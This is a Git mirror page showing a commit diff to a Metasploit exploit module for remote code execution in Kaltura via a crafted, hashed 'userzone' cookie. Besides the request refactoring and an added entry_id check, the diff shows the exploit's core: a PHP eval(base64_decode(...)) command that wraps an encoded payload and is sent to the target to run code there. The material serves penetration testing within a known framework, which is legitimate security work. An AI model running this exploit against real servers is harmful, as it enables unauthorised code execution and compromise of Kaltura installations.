infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add entry_id verification; clean up http request calls

MS-2855/keylogger-mettle-extension
Robin Verton 2017-10-23 15:19:35 +02:00
parent 30a86a1204
commit 0ac7e0926c
1 changed files with 29 additions and 4 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

33
modules/exploits/linux/http/kaltura_unserialize_cookie_rce.rb
View File

@ -74,7 +74,11 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => { 'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}" 'Cookie' => "userzone=#{encoded}#{hash}"
} }
@ -85,12 +89,29 @@ class MetasploitModule < Msf::Exploit::Remote
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
elsif res && res.body.include?(r) elsif res && res.body.include?(r)
Exploit::CheckCode::Vulnerable Exploit::CheckCode::Vulnerable
elsif not self.check_entryid()
print_error("Invalid ENTRYID")
Exploit::CheckCode::Safe
else else
print_warning("Did you use a valid entry_id?")
Exploit::CheckCode::Safe Exploit::CheckCode::Safe
end end
end end
def check_entryid
entry_id = datastore['ENTRYID']
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
}
)
return res.body.include? entry_id
end
def exploit def exploit
entry_id = datastore['ENTRYID'] entry_id = datastore['ENTRYID']
cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()" cmd = "print_r(eval(base64_decode('#{Rex::Text.encode_base64(payload.encode)}'))).die()"
@ -109,7 +130,11 @@ class MetasploitModule < Msf::Exploit::Remote
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => normalize_uri(target_uri.path, "index.php/keditorservices/getAllEntries?list_type=15&entry_id=#{entry_id}"), 'uri' => normalize_uri(target_uri.path, 'index.php', 'keditorservices', 'getAllEntries'),
'vars_get' => {
'list_type' => '15',
'entry_id' => entry_id
},
'headers' => { 'headers' => {
'Cookie' => "userzone=#{encoded}#{hash}" 'Cookie' => "userzone=#{encoded}#{hash}"
} }
@ -118,7 +143,7 @@ class MetasploitModule < Msf::Exploit::Remote
if res and res.redirect? if res and res.redirect?
print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}") print_error("Got a redirect, maybe you are not using https? #{res.headers['Location']}")
elsif res and res.code != 200 elsif res and res.code != 200
print_error("Unexpected response...") print_error('Unexpected response...')
else else
print_status("Output: #{res.body}") print_status("Output: #{res.body}")
end end